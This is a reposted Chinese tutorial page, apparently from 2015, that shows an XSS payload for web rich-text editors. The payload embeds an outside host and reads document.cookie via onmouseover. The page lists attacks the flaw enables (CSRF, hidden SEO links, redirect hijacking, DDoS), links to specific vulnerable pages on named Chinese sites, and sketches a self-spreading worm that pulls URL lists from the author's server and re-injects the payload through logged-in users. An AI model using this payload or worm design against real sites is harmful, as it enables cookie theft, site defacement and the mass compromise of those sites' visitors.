来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 测试代码:embed src=http://tmxk.org /a href=http:// www.2cto.com http://tmxk.org/aspanonmouseover=javascript:alert(document.cookie)alert(document.cookie)/spanimg src=javasc......
测试代码:
<embed src="http://tmxk.org" /> <a href="http:// www.2cto.com ">http://tmxk.org</a> <span onmouseover="javascript:alert(document.cookie)">alert(document.cook ie)</span> <img src="javascript:alert()" /> <iframe src="http://tmxk.org"></iframe> <form> <input type="text" /> </form>
测试环境:基于官方的demo、遨游浏览器(embed是html5标签,低版本的ie不支持) 测试思路:容许embed标签的插入,在没有对其allowScriptAccess属性设置时,默认为 sameDomain,这样就形成了xss,已测试可利用的五点有 ①CSRF,利用访问者的权限来完成对指定页面的操作; ②SEO,即挂暗链操作; ③域名劫持,通过被插入页面不能被框架插入的特性,实现url跳转,即劫持; ④DDOS,利用被跨X站点的高流量,对指定url实现ddos攻击; ⑤蠕虫,结合一些站点特有的代码,形成蠕虫。
测试截图: 1.FCKeditor 2.NicEdit
3.TinyMCE 4.jwysiwyg 5.Yahoo!UILibrary:RichTextEditor 6.Xinha 8.FreeRichTextEditor 10.TTWHTMLEditor 11.FreeTextBox
13.BlueShoesWysiwygEditor 14.markItUp 15.SPAWEditor
测试举例: sina博客xss+csrf http://blog.sina.com.cn/u/2778335652 人民网xss http://blog.people.com.cn/open/articleFine.do?articleId=1336990275712 cntv博客、论坛的xss http://blog.cntv.cn/19047516-3863143.html 中国教育网博客 http://exe.blog.edu.cn/2012/751413.html 开源中国(以此举例) DDOS:http://my.oschina.net/hucexe/blog/60426
蠕虫思路:打开http://tmxk.org/z/test/r.php?n=1-222的随机数,这里面是对指定页数用 户分享的代码的连接的抓取,形成数组http://tmxk.org/z/test/os.js供蠕虫代码调用。利用登 陆用户的权限对随机的url回复,利用编辑器的xss,再次插入测试代码,别的用户访问被 感染的网页时,csrf又再次向随机的一个网页插入此代码,如此爆炸式传播。 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com